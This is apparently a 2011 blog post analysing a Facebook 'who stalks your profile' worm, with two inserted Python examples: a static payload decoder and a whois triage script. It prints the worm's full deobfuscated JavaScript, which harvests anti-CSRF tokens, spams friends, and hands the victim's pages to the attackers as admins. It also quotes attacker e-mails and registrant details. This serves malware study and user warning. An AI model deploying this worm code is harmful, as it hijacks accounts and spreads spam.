profileview.info disassembled – Or the anatomy of a facebook worm

2011/02/22

Have you received one of these links via Facebook?

Wow! Seems like lots of people stalk me – http://ow.ly/3YDVb
Secret tool shows who stalks your pics – http://tinyurl.com/6gowfed
New FB tool shows who stalks your profile– http://ow.ly/3YDVB
Insane! Awesome tool to see who looks at your pics >> http://goo.gl/lfDvG

Don't click them. I will show you why:

When you open the website, it runs a JavaScript payload that has been encoded so that it looks like shellcode (a long comma-separated list of numbers):

http://pastebin.com/umwmnbaN

It really looks like garbage, so let's decode it:

http://pastebin.com/FmGN13Tm

So let's see what it does (my comments always follow the code they describe):

function obscurify(my_content) {
  st = my_content['split'](',');
  d = '';
  for (i = 0; i < st['length']; i++) {
    d += String['fromCharCode'](st[i] - 24);
  };
  eval(d);
};

OK, this is the deobfuscation routine: the payload is a comma-separated list of numbers, each one is a character code plus 24, and the decoded string is handed straight to eval().
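A static decoder for this encoding, written as an added example for this post (it is not code from the worm or from the pastebin): it reproduces the arithmetic of obscurify() without ever evaluating the result, returns the decoded source, and lists the browser APIs and hostnames found in it, which is how an analyst would triage such a blob. The sample payload is constructed inline from a harmless script; the indicator list is this example's own choice, based on the APIs the worm itself uses.

```python
"""Static decoder for the comma-separated 'char code + 24' encoding.

Added example, not code from the original post or the worm. decode_payload()
does the same arithmetic as obscurify() but never calls eval(); the decoded
source is returned as text for inspection.
"""
import re

OFFSET = 24  # the constant the worm subtracts from every number

# Strings an analyst would look for in decoded browser malware. Assumption:
# this list is ours, chosen from the APIs the worm itself calls.
INDICATORS = [
    "eval(", "XMLHttpRequest", "document['cookie']", "document.cookie",
    "fb_dtsg", "post_form_id", "setInterval(", "window['location']",
]


def encode_payload(source: str, offset: int = OFFSET) -> str:
    """Inverse of the worm's routine; used here only to build test input."""
    return ",".join(str(ord(ch) + offset) for ch in source)


def decode_payload(blob: str, offset: int = OFFSET) -> str:
    """Reproduce obscurify() without the eval: each number -> chr(number - offset)."""
    out = []
    for token in blob.split(","):
        token = token.strip()
        if not token:
            continue  # tolerate a trailing comma
        if not token.lstrip("-").isdigit():
            raise ValueError(f"not a numeric token: {token!r}")
        code = int(token) - offset
        if not 0 <= code <= 0x10FFFF:
            raise ValueError(f"char code out of range: {code}")
        out.append(chr(code))
    return "".join(out)


def find_indicators(source: str) -> list[str]:
    """Which of the INDICATORS strings occur in the decoded source, in list order."""
    return [ind for ind in INDICATORS if ind in source]


def find_hosts(source: str) -> list[str]:
    """Hostnames appearing in http(s) URLs inside the decoded source, deduplicated."""
    return sorted(set(re.findall(r"https?://([A-Za-z0-9.-]+)", source)))


def triage(blob: str) -> dict:
    """Decode a blob and summarise what is in it, without executing anything."""
    source = decode_payload(blob)
    return {
        "source": source,
        "indicators": find_indicators(source),
        "hosts": find_hosts(source),
    }


# Constructed sample: a harmless script in the same shape as the worm's second
# stage, encoded with the worm's own scheme. Not captured from the real site.
SAMPLE_SOURCE = (
    "with(x = new XMLHttpRequest){open('GET','http://example.invalid/');"
    "send(null);};eval('1');"
)
SAMPLE_BLOB = encode_payload(SAMPLE_SOURCE)

if __name__ == "__main__":
    report = triage(SAMPLE_BLOB)
    print(report["source"])
    print("indicators:", report["indicators"])
    print("hosts:", report["hosts"])
```

Pointing decode_payload() at the real first-stage string would give the same text the second pastebin shows, but as data rather than as running code; the eval() in the original is exactly the step an analyst should never reproduce.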

function addAdmin(evil_facebook_page, array_emails, Form_ID, csrf_token) {
  iemails = array_emails['split'](',');
  main_emails = [];
  for (i = 0; i < iemails['length']; i++) {
    main_emails[i] = 'friendselector_input[]=' + iemails[i] + '&friend_selected[]=';
  };
  with(newx = new XMLHttpRequest) {
    open('POST', '/pages/edit/?id=' + evil_facebook_page + '&sk=admin');
    setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    send('post_form_id=' + Form_ID + '&fb_dtsg=' + csrf_token + '&fbpage_id=' + evil_facebook_page + '&' + main_emails['join']('&') + '&save=1');
  };
};

Here is the function that invites a list of e-mail addresses to a page through the admin edit form (sk=admin); the worm calls it later with its own addresses.

function makePost(form_id, message_content, target_friend, unused_var1) {
  formx = form_id['match'](/name="post_form_id" value="([\d\w]+)"/)[1];
  dtx = form_id['match'](/name="fb_dtsg" value="([^"]+)"/)[1];
  composerx = form_id['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
  msg = message_content['randomize']() + '\x0A\x0A';
  text_post = '';
  text_actual = '';
  pxt = 'post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + target_friend['split']('|')[0] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(msg + text_actual['replace'](/\, $/, '')) + '&xhpc_message=' + encodeURIComponent(msg + text_post['replace'](/\, $/, '')) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest';
  update(pxt);
};

This is the function that spams your friends: it picks a random message and posts it on the wall of the given friend.

function update(evil_facebook_app) {
  with(newx = new XMLHttpRequest) {
    open('POST', '/ajax/updatestatus.php?__a=1');
    setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    send(evil_facebook_app);
  };
};

This function posts on your wall (it sets a status message).

goog1 = 'http://goo.gl/cvY4D';
goog2 = 'http://goo.gl/euvS3';
goog3 = 'http://tiny.cc/v1bwd';
goog4 = 'http://goo.gl/G0yae';
goog5 = 'http://goo.gl/NMclq';
goog6 = 'http://goo.gl/S89Bx';
event_id = '168046893242650';
page_id_x = '195926070436089';
page_id_xx = '136589129739532';
statuses = ['Wow! Seems like lots of people stalk me - ' + goog1, 'New FB tool shows who stalks your profile- ' + goog2, 'Secret tool shows who stalks your pics ' + goog3, 'Insane! Awesome tool to see who looks at your pics >> ' + goog4, 'According to ' + goog5 + ' you\'re my top stalker. Creep.', 'Secret tool shows who stalks your pics - ' + goog6];
subjects = ['Check this out!', 'Hey, whats happening?', 'Hey! This is awesome'];

Here are the shortened links and the texts used for the spam messages, plus the ids of the event and the two pages the worm will use.

admin_emails = 'wintersaccohoqr@hotmail.com,adrialovato306@yahoo.com';

These are the accounts of the creators of the malware. They receive all your Facebook e-mail addresses, which are then sold to spammers...

Array['prototype']['randomize'] = function () {
  return this[Math['floor'](Math['random']() * this['length'])];
};
Object['prototype']['isReady'] = function () {
  if (this['readyState'] == 4 && this['status'] == 200) {
    return true;
  } else {
    return false;
  };
};
String['prototype']['getFriends'] = function () {
  friends2 = this['match'](/facebook\.com\\\\\\\/profile\.php\?id=\d+\\\\\\\">(<span[^>]+>|)[^<>]+/gi)['join'](':')['replace'](/(facebook\.com\\\\\\\/|profile\.php\?id=|<span[^>]+>|l\.php.*)/gi, '')['replace'](/\\\\\\\">/gi, '|')['split'](':')['slice'](1);
  return friends2;
};

Helper methods added to the built-in prototypes: randomize() picks a random array element, isReady() checks whether an XMLHttpRequest has completed with status 200, and getFriends() scrapes "id|name" pairs out of the HTML of the friend list.

function addAdmin(evil_facebook_page, array_emails, Form_ID, csrf_token) {
  iemails = array_emails['split'](',');
  main_emails = [];
  for (i = 0; i < iemails['length']; i++) {
    main_emails[i] = 'friendselector_input[]=' + iemails[i] + '&friend_selected[]=';
  };
  with(newx = new XMLHttpRequest) {
    open('POST', '/pages/edit/?id=' + evil_facebook_page + '&sk=admin');
    setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    send('post_form_id=' + Form_ID + '&fb_dtsg=' + csrf_token + '&fbpage_id=' + evil_facebook_page + '&' + main_emails['join']('&') + '&save=1');
  };
};

OK, the addAdmin function again; these guys didn't know much about coding.

function loading() {
  var _0x91e5x10 = document['createElement']('div');
  _0x91e5x10['id'] = 'screwyouz';
  _0x91e5x10['setAttribute']('align', 'center');
  _0x91e5x10['style']['margin'] = '0px auto';
  _0x91e5x10['style']['position'] = 'absolute';
  _0x91e5x10['style']['top'] = '10px';
  _0x91e5x10['style']['zindex'] = '100';
  _0x91e5x10['className'] = 'screwyou';
  _0x91e5x10['innerHTML'] = '<br /><br /><br /><br /><br /><center><img src="http://fbviews.org/process.gif" /><br />Scanning may take up to 3 minutes</center>';
  document['body']['appendChild'](_0x91e5x10);
};

This is what the coders of the malware think of you: "screwyou". It shows an animation, as if it were scanning your profile. It's just b**s***.

function makePost(form_id, message_content, target_friend, unused_var1) {

<snip>

function update(evil_facebook_app) {

<snip>

Copy & paste can sometimes be a hard job; you lose track of how often you pasted something...

if (window['location']['href'] == 'http://www.facebook.com/') {
  formx = (res = document['body']['innerHTML'])['match'](/name="post_form_id" value="([\d\w]+)"/)[1];
  dtx = res['match'](/name="fb_dtsg" value="([^"]+)"/)[1];
  composerx = res['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
} else {
  with(muhaha = new XMLHttpRequest) {
    open('GET', '/', false);
    send(null);
  };
  formx = (res = muhaha['responseText'])['match'](/name="post_form_id" value="([\d\w]+)"/)[1];
  dtx = res['match'](/name="fb_dtsg" value="([^"]+)"/)[1];
  composerx = res['match'](/name=\\\"xhpc_composerid\\\" value=\\\"([^"]+)\\\"/)[1];
};

Now they grab fresh CSRF tokens (post_form_id and fb_dtsg) from the post form of the Facebook site, fetching the front page if they are not already on it. These tokens are supposed to prevent Cross-Site Request Forgery, but they only stop requests coming from another origin: a script running inside facebook.com can read them from the page like any other text.

alert('Hello!\x0A\x0ATo activate the tool press Enter on your keyboard. \x0A\x0AThis will take 2-3 minutes, while waiting please do not close this window or tab.');

This shows the message box, pretending that scanning your profile takes a long time. In reality it is posting on all of your friends' walls and sending out messages. It also makes you a fan of the malware's pages...

update('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + document['cookie']['match'](/c_user=(\d+)/)[1] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(stx = statuses['randomize']()) + '&xhpc_message=' + encodeURIComponent(stx) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest');
with(newz = new XMLHttpRequest) {
  loading();
  open('POST', '/ajax/pages/fan_status.php?__a=1');
  setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  send('fbpage_id=' + page_id_x + '&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&post_form_id_source=AsyncRequest');
};
with(newzz = new XMLHttpRequest) {
  open('POST', '/ajax/pages/fan_status.php?__a=1');
  setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  send('fbpage_id=' + page_id_xx + '&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&post_form_id_source=AsyncRequest');
};
void 0;
with(fr = new XMLHttpRequest) {
  open('GET', '/ajax/browser/list/friends/all/?uid=' + (me = document['cookie']['match'](/c_user=(\d+)/)[1]) + '&offset=0&dual=1&__a=1');
  onreadystatechange = function () {
    if (fr['isReady']()) {
      friends = fr['responseText']['getFriends']();
      idx = [];
      for (i = 0; i < friends['length']; i++) {
        if (!isNaN(friends[i]['split']('|')[0])) {
          idx[i] = 'ids[' + i + ']=' + friends[i]['split']('|')[0];
        };
      };
      with(invi = new XMLHttpRequest) {
        open('POST', '/ajax/social_graph/invite_dialog.php?__a=1');
        setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        send('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&send_invitations=1&invite_id_list=&email_addresses=&invite_msg=&' + idx['join']('&') + '&node_id=' + event_id + '&class=GuestManager&__d=1&lsd&post_form_id_source=AsyncRequest');
      };
      cnt_fr = 0;
      tx = setInterval(function () {
        if (cnt_fr == friends['length']) {
          window['location'] = 'http://fbviews.org/result.php';
          clearInterval(tx);
        };
        makePost(document['body']['innerHTML'], statuses, friends[cnt_fr], friends);
        with(xa = new XMLHttpRequest) {
          open('GET', '/ajax/messaging/composer.php?__a=1&__d=1');
          onreadystatechange = function () {
            if (xa['isReady']()) {
              compi = xa['responseText']['match'](/([\d\w]+)_error/)[1];
              pxi = 'ids_' + compi + '[0]=' + friends[cnt_fr]['split']('|')[0] + '&subject=' + encodeURIComponent(subjects['randomize']()) + '&status=' + encodeURIComponent(statuses['randomize']()) + '&ids[0]=' + friends[cnt_fr]['split']('|')[0] + '&action=send_new&home_tab_id=1&profile_id=' + document['cookie']['match'](/c_user=(\d+)/)[1] + '&target_id=0&app_id=&&composer_id=' + compi + '&hey_kid_im_a_composer=true&thread&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&_log_action=send_new&_log_thread&ajax_log=1&post_form_id_source=AsyncRequest';
              if (cnt_fr < 15) {
                with(mi = new XMLHttpRequest) {
                  open('POST', '/ajax/gigaboxx/endpoint/MessageComposerEndpoint.php?__a=1');
                  setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                  send(pxi);
                };
              };
            };
          };
          send(null);
        };
        cnt_fr += 1;
      }, 3000);
    };
  };
  send(null);
};

This is the code doing the dirty work. Let's go through it step by step:

with(fr = new XMLHttpRequest) {
  open('GET', '/ajax/browser/list/friends/all/?uid=' + (me = document['cookie']['match'](/c_user=(\d+)/)[1]) + '&offset=0&dual=1&__a=1');

It fetches the list of all your friends (your own user id is taken from the c_user cookie).

  onreadystatechange = function () {
    if (fr['isReady']()) {
      friends = fr['responseText']['getFriends']();
      idx = [];
      for (i = 0; i < friends['length']; i++) {
        if (!isNaN(friends[i]['split']('|')[0])) {
          idx[i] = 'ids[' + i + ']=' + friends[i]['split']('|')[0];
        };
      };
      with(invi = new XMLHttpRequest) {
        open('POST', '/ajax/social_graph/invite_dialog.php?__a=1');
        setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        send('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&send_invitations=1&invite_id_list=&email_addresses=&invite_msg=&' + idx['join']('&') + '&node_id=' + event_id + '&class=GuestManager&__d=1&lsd&post_form_id_source=AsyncRequest');
      };

It sends all of them an invitation to the worm's event.

      cnt_fr = 0;
      tx = setInterval(function () {
        if (cnt_fr == friends['length']) {
          window['location'] = 'http://fbviews.org/result.php';

Once every friend has been processed, you are redirected to the page that supposedly calculates who visited whom.

          clearInterval(tx);
        };
        makePost(document['body']['innerHTML'], statuses, friends[cnt_fr], friends);
        with(xa = new XMLHttpRequest) {
          open('GET', '/ajax/messaging/composer.php?__a=1&__d=1');
          onreadystatechange = function () {
            if (xa['isReady']()) {
              compi = xa['responseText']['match'](/([\d\w]+)_error/)[1];
              pxi = 'ids_' + compi + '[0]=' + friends[cnt_fr]['split']('|')[0] + '&subject=' + encodeURIComponent(subjects['randomize']()) + '&status=' + encodeURIComponent(statuses['randomize']()) + '&ids[0]=' + friends[cnt_fr]['split']('|')[0] + '&action=send_new&home_tab_id=1&profile_id=' + document['cookie']['match'](/c_user=(\d+)/)[1] + '&target_id=0&app_id=&&composer_id=' + compi + '&hey_kid_im_a_composer=true&thread&post_form_id=' + formx + '&fb_dtsg=' + dtx + '&lsd&_log_action=send_new&_log_thread&ajax_log=1&post_form_id_source=AsyncRequest';
              if (cnt_fr < 15) {
                with(mi = new XMLHttpRequest) {
                  open('POST', '/ajax/gigaboxx/endpoint/MessageComposerEndpoint.php?__a=1');
                  setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                  send(pxi);
                };
              };
            };
          };
          send(null);
        };
        cnt_fr += 1;
      }, 3000);
    };
  };
  send(null);
};
with(ins = new XMLHttpRequest) {
  open('GET', '/insights/?_fb_noscript=1');
  onreadystatechange = function () {
    if (ins['isReady']()) {
      ids = ins['responseText']['match'](/po_\d+">View/gi)['join'](':')['replace'](/(po_|">View)/gi, '')['split'](':');
      cnt_pages = 0;
      tz = setInterval(function () {
        if (cnt_pages == ids['length']) {
          window['location'] = 'http://fbviews.org/result.php';
          clearInterval(tz);
        };
        update('post_form_id=' + formx + '&fb_dtsg=' + dtx + '&xhpc_composerid=' + composerx + '&xhpc_targetid=' + ids[cnt_pages] + '&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=' + encodeURIComponent(stx = statuses['randomize']()) + '&xhpc_message=' + encodeURIComponent(stx) + '&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest');
        addAdmin(ids[cnt_pages], admin_emails, formx, dtx);
        cnt_pages += 1;
      }, 3000);
    };
  };
  send(null);
};

Every three seconds it posts on one friend's wall and, for the first 15 friends, also sends a private message. Finally it collects the ids of the pages you administer from /insights/, posts the spam status to each of them and adds the attackers' e-mail addresses as admins of those pages...

So it's a big price for some unreliable information: you give away all your contacts' e-mail addresses for free and send spam in your name! This will damage your reputation and fill up your mailbox with Viagra spam.

Some more information about the domains:

whois fbviews.org

Domain ID:D161495457-LROR
Domain Name:FBVIEWS.ORG
Created On:14-Feb-2011 05:50:54 UTC
Last Updated On:14-Feb-2011 05:58:34 UTC
Expiration Date:14-Feb-2012 05:50:54 UTC
Sponsoring Registrar:eNom, Inc. (R39-LROR)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:de089e4b90247f03
Registrant Name:mister hood
Registrant Street1:14762 Geronomo st
Registrant Street2:
Registrant Street3:
Registrant City:San Diego
Registrant State/Province:CA
Registrant Postal Code:92105
Registrant Country:US
Registrant Phone:+1.6192264473
Registrant Phone Ext.:
Registrant FAX:+1.5555555555
Registrant FAX Ext.:
Registrant Email:eviewoolfolk579@yahoo.com

whois profileview.info

Domain ID:D36383271-LRMS
Domain Name:PROFILEVIEW.INFO
Created On:17-Jan-2011 03:27:44 UTC
Last Updated On:17-Jan-2011 10:37:21 UTC
Expiration Date:17-Jan-2012 03:27:44 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:CR72743087
Registrant Name:Registration Private
Registrant Organization:Domains by Proxy, Inc.
Registrant Street1:DomainsByProxy.com
Registrant Street2:15111 N. Hayden Rd., Ste 160, PMB 353
Registrant Street3:
Registrant City:Scottsdale
Registrant State/Province:Arizona
Registrant Postal Code:85260
Registrant Country:US
Registrant Phone:+1.4806242599
Registrant Phone Ext.:
Registrant FAX:+1.4806242598
Registrant FAX Ext.:
Registrant Email:PROFILEVIEW.INFO@domainsbyproxy.com
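A small whois triage script, added here as an example (it is not part of the original post): it parses the "Key:Value" records quoted above and flags what an analyst looks for when a domain turns up in a spam campaign: a registration only days before the campaign, a registrant e-mail at a free webmail provider, a placeholder phone or fax number, and a registrant hidden behind a privacy proxy. The two records are copied from the whois output above (trimmed to the relevant fields); the reference date is the post's publication date, 2011/02/22; the 30-day threshold and the short free-mail list are this example's own assumptions.

```python
"""Whois triage for the two domains in the post. Added example, not the post's
own tooling. Parses key:value whois text and returns a list of findings."""
from datetime import datetime, timezone

# Reference date: the publication date of the post.
POST_DATE = datetime(2011, 2, 22, tzinfo=timezone.utc)

# Records copied from the whois output quoted in the post (relevant fields only).
FBVIEWS_WHOIS = """\
Domain Name:FBVIEWS.ORG
Created On:14-Feb-2011 05:50:54 UTC
Sponsoring Registrar:eNom, Inc. (R39-LROR)
Registrant Name:mister hood
Registrant Phone:+1.6192264473
Registrant FAX:+1.5555555555
Registrant Email:eviewoolfolk579@yahoo.com
"""

PROFILEVIEW_WHOIS = """\
Domain Name:PROFILEVIEW.INFO
Created On:17-Jan-2011 03:27:44 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Registrant Name:Registration Private
Registrant Organization:Domains by Proxy, Inc.
Registrant Phone:+1.4806242599
Registrant FAX:+1.4806242598
Registrant Email:PROFILEVIEW.INFO@domainsbyproxy.com
"""

FREEMAIL = {"yahoo.com", "hotmail.com", "gmail.com"}  # assumption: our own short list
FRESH_DAYS = 30                                       # assumption: our own threshold


def parse_whois(text: str) -> dict:
    """Split 'Key:Value' lines into a dict; a repeated key keeps its last value."""
    record = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        record[key.strip()] = value.strip()
    return record


def parse_whois_date(value: str) -> datetime:
    """Dates in this registrar format look like '14-Feb-2011 05:50:54 UTC'."""
    return datetime.strptime(value, "%d-%b-%Y %H:%M:%S UTC").replace(tzinfo=timezone.utc)


def is_placeholder_number(number: str) -> bool:
    """+1.5555555555 style: every digit after the country code is the same."""
    digits = number.split(".", 1)[-1]
    return len(digits) >= 7 and len(set(digits)) == 1


def domain_age_days(record: dict, reference: datetime = POST_DATE) -> int:
    """Whole days between registration and the reference date."""
    return (reference - parse_whois_date(record["Created On"])).days


def triage_whois(text: str, reference: datetime = POST_DATE) -> list[str]:
    record = parse_whois(text)
    findings = []
    age = domain_age_days(record, reference)
    if age < FRESH_DAYS:
        findings.append(f"registered {age} days before the campaign")
    email_domain = record.get("Registrant Email", "").rsplit("@", 1)[-1].lower()
    if email_domain in FREEMAIL:
        findings.append(f"registrant uses free webmail ({email_domain})")
    for field in ("Registrant Phone", "Registrant FAX"):
        if is_placeholder_number(record.get(field, "")):
            findings.append(f"{field} is a placeholder number")
    org = record.get("Registrant Organization", "")
    if "proxy" in org.lower():
        findings.append(f"registrant hidden behind a privacy proxy ({org})")
    return findings


if __name__ == "__main__":
    for name, text in (("fbviews.org", FBVIEWS_WHOIS), ("profileview.info", PROFILEVIEW_WHOIS)):
        print(name)
        for finding in triage_whois(text):
            print("  -", finding)
```

None of these findings proves a domain is malicious on its own; a week-old domain with a fake fax number and a free-mail registrant is simply what a throwaway campaign domain tends to look like, and the proxy-registered one shows why registrant data alone is rarely enough.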
